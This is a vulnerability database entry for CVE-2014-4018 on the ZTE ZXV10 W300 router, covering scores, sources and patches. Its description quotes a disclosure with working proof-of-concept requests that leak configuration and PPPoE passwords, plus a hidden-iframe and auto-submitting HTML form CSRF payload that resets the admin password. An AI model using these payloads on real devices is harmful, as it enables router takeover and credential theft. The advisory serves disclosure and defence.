Details of VAR-201407-0352

ID

VAR-201407-0352

CVE

CVE-2014-4018

TITLE

ZTE ZXV10 W300 Vulnerability to gain access rights in router firmware

Trust: 0.8

sources: JVNDB: JVNDB-2014-003362

DESCRIPTION

The ZTE ZXV10 W300 router with firmware W300V1.0.0a_ZRD_LK has a default password of admin for the admin account, which makes it easier for remote attackers to obtain access via unspecified vectors. The ZTE WXV10 W300 is a wireless router device. The ZTE WXV10 W300 default password is vulnerable. ZTE WXV10 W300 routers are prone to the following security vulnerabilities: 1. An insecure-default-password vulnerability. 2. Multiple information disclosure vulnerabilities. 3. A cross-site request-forgery vulnerability. This may aid in further attacks. A remote attacker could exploit this vulnerability to gain access. There is a disclosure in which anyone can download that file without any authentication by a simple GET request. POC: http://192.168.1.1/rom-0 You can find the router password using my rom-0 configuration decompressor. http://packetstormsecurity.com/files/127049/ZTE-TP-Link-ZynOS-Huawei-rom-0-Configuration-Decompressor.html #3| PPPoE/PPPoA Password Disclosure in tc2wanfun.js (CVE-2014-4154) --------------------------------------------------------------------- If you look at the frame source in the "Internet" tab under the "Interface Setup" you can see this doLoad function in line 542 which fetches the password and displays it there. The frame URI is /basic/home_wan.htm. function doLoad() { var value = document.forms[0].wanTypeRadio[2].checked; doEnable(); QosCheck(); WANChkIdleTimeT(); if (value) pppStaticCheck(); LockWhenPVC0(); LockPVC(); if(document.forms[0].wan_PPPPassword != null) { document.forms[0].wan_PPPPassword.value = pwdppp; } } The "pwdpp" is loaded from an external file which you can see at the bottom of the page. <script language="javascript" src="/basic/tc2wanfun.js"></script> Once the user authenticates the router till another successful restart the password is written in that external JS file. POC: http://192.168.1.1/basic/tc2wanfun.js #4| Admin Password Manipulation CSRF (CVE-2014-4155) ----------------------------------------------------- You can change the password to blank by requesting /Forms/tools_admin_1 with a GET requesting containing HTTP basic authentication. POC: <iframe src="http://192.168.1.1/Forms/tools_admin_1" width="0" height="0"></iframe> If you send something like above to the victim, he will be prompted for the login and once he enter his credentials, his password will be immediately changed to a blank password. Ofcourse since there is no XSRF token in the request you change the password as you wish. POC: <html> <body> <form name="exploit" action="http://192.168.1.1/Forms/tools_admin_1" method="POST"> <input type="hidden" name="uiViewTools_Password" value="your_passwd" /> <input type="hidden" name="uiViewTools_PasswordConfirm" value="your_passwd" /> <script>document.exploit.submit(); </script> </form> </body> </html> #5| Denial of Service ----------------------- You can see my previous post about this vulnerability and the exploit. https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/ http://www.osvdb.org/show/osvdb/108076 http://packetstormsecurity.com/files/127076/ZTE-TP-Link-RomPager-Denial-Of-Service.html http://www.exploit-db.com/exploits/33737

Trust: 2.61

sources: NVD: CVE-2014-4018 // JVNDB: JVNDB-2014-003362 // CNVD: CNVD-2014-03842 // BID: 68082 // VULHUB: VHN-71958 // PACKETSTORM: 127129

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2014-03842

AFFECTED PRODUCTS

vendor:	zte	model:	zxv10 w300	scope:	eq	version:	1.0.0a_zrd_lk	Trust: 2.4
vendor:	zte	model:	zxv10 w300	scope:	eq	version:	-	Trust: 1.0
vendor:	zte	model:	zxv10 w300	scope:	-	version:	-	Trust: 0.8
vendor:	zte	model:	zxv10 w300 router v1.0.0a zrd lk	scope:	-	version:	-	Trust: 0.6
vendor:	zte	model:	wxv10 w300	scope:	eq	version:	0	Trust: 0.3

sources: CNVD: CNVD-2014-03842 // BID: 68082 // JVNDB: JVNDB-2014-003362 // CNNVD: CNNVD-201407-360 // NVD: CVE-2014-4018

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2014-4018
value:	HIGH
Trust: 1.0
NVD:	CVE-2014-4018
value:	HIGH
Trust: 0.8
CNVD:	CNVD-2014-03842
value:	MEDIUM
Trust: 0.6
CNNVD:	CNNVD-201407-360
value:	HIGH
Trust: 0.6
VULHUB:	VHN-71958
value:	HIGH
Trust: 0.1

nvd@nist.gov:	CVE-2014-4018
severity:	HIGH
baseScore:	7.8
vectorString:	AV:N/AC:L/AU:N/C:N/I:C/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	COMPLETE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	6.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
CNVD:	CNVD-2014-03842
severity:	MEDIUM
baseScore:	6.8
vectorString:	AV:N/AC:M/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	8.6
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-71958
severity:	HIGH
baseScore:	7.8
vectorString:	AV:N/AC:L/AU:N/C:N/I:C/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	COMPLETE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	6.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

sources: CNVD: CNVD-2014-03842 // VULHUB: VHN-71958 // JVNDB: JVNDB-2014-003362 // CNNVD: CNNVD-201407-360 // NVD: CVE-2014-4018

PROBLEMTYPE DATA

problemtype:

CWE-255

Trust: 1.9

sources: VULHUB: VHN-71958 // JVNDB: JVNDB-2014-003362 // NVD: CVE-2014-4018

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201407-360

TYPE

trust management

Trust: 0.6

sources: CNNVD: CNNVD-201407-360

CONFIGURATIONS

sources: JVNDB: JVNDB-2014-003362

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-71958

PATCH

title:	ZXV10 W300S	url:	http://wwwen.zte.com.cn/en/products/access/cpe/201302/t20130204_386351.html	Trust: 0.8
title:	ZTE WXV10 W300 default password vulnerability patch	url:	https://www.cnvd.org.cn/patchInfo/show/46655	Trust: 0.6

sources: CNVD: CNVD-2014-03842 // JVNDB: JVNDB-2014-003362

EXTERNAL IDS

db:	NVD	id:	CVE-2014-4018	Trust: 3.5
db:	PACKETSTORM	id:	127129	Trust: 2.4
db:	EXPLOIT-DB	id:	33803	Trust: 1.7
db:	BID	id:	68082	Trust: 0.9
db:	JVNDB	id:	JVNDB-2014-003362	Trust: 0.8
db:	CNVD	id:	CNVD-2014-03842	Trust: 0.6
db:	CNNVD	id:	CNNVD-201407-360	Trust: 0.6
db:	SEEBUG	id:	SSVID-86988	Trust: 0.1
db:	SEEBUG	id:	SSVID-89190	Trust: 0.1
db:	VULHUB	id:	VHN-71958	Trust: 0.1
db:	EXPLOIT-DB	id:	33737	Trust: 0.1
db:	OSVDB	id:	108076	Trust: 0.1

sources: CNVD: CNVD-2014-03842 // VULHUB: VHN-71958 // BID: 68082 // JVNDB: JVNDB-2014-003362 // PACKETSTORM: 127129 // CNNVD: CNNVD-201407-360 // NVD: CVE-2014-4018

REFERENCES

url:	https://osandamalith.wordpress.com/2014/06/15/zte-wxv10-w300-multiple-vulnerabilities/	Trust: 2.5
url:	http://www.exploit-db.com/exploits/33803	Trust: 1.7
url:	http://packetstormsecurity.com/files/127129/zte-wxv10-w300-disclosure-csrf-default.html	Trust: 1.7
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4018	Trust: 0.8
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4018	Trust: 0.8
url:	http://packetstormsecurity.com/files/127129/ztewxv10-defaultdisclosecsrfdos.txt	Trust: 0.6
url:	http://wwwen.zte.com.cn/en/	Trust: 0.3
url:	http://packetstormsecurity.com/files/127049/zte-tp-link-zynos-huawei-rom-0-configuration-decompressor.html	Trust: 0.1
url:	http://192.168.1.1/basic/tc2wanfun.js	Trust: 0.1
url:	http://192.168.1.1/rom-0	Trust: 0.1
url:	http://packetstormsecurity.com/files/127076/zte-tp-link-rompager-denial-of-service.html	Trust: 0.1
url:	http://www.osvdb.org/show/osvdb/108076	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2014-4154	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2014-4155	Trust: 0.1
url:	https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2014-4019	Trust: 0.1
url:	http://192.168.1.1/forms/tools_admin_1"	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2014-4018	Trust: 0.1
url:	http://www.exploit-db.com/exploits/33737	Trust: 0.1

sources: CNVD: CNVD-2014-03842 // VULHUB: VHN-71958 // BID: 68082 // JVNDB: JVNDB-2014-003362 // PACKETSTORM: 127129 // CNNVD: CNNVD-201407-360 // NVD: CVE-2014-4018

CREDITS

Osanda Malith

Trust: 0.4

sources: BID: 68082 // PACKETSTORM: 127129

SOURCES

db:	CNVD	id:	CNVD-2014-03842
db:	VULHUB	id:	VHN-71958
db:	BID	id:	68082
db:	JVNDB	id:	JVNDB-2014-003362
db:	PACKETSTORM	id:	127129
db:	CNNVD	id:	CNNVD-201407-360
db:	NVD	id:	CVE-2014-4018

LAST UPDATE DATE

2024-11-23T21:55:20.066000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2014-03842	date:	2014-06-24T00:00:00
db:	VULHUB	id:	VHN-71958	date:	2014-07-16T00:00:00
db:	BID	id:	68082	date:	2014-06-17T00:00:00
db:	JVNDB	id:	JVNDB-2014-003362	date:	2014-07-17T00:00:00
db:	CNNVD	id:	CNNVD-201407-360	date:	2014-07-17T00:00:00
db:	NVD	id:	CVE-2014-4018	date:	2024-11-21T02:09:20.710

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2014-03842	date:	2014-06-24T00:00:00
db:	VULHUB	id:	VHN-71958	date:	2014-07-16T00:00:00
db:	BID	id:	68082	date:	2014-06-17T00:00:00
db:	JVNDB	id:	JVNDB-2014-003362	date:	2014-07-17T00:00:00
db:	PACKETSTORM	id:	127129	date:	2014-06-17T23:04:35
db:	CNNVD	id:	CNNVD-201407-360	date:	2014-07-17T00:00:00
db:	NVD	id:	CVE-2014-4018	date:	2014-07-16T14:19:03.823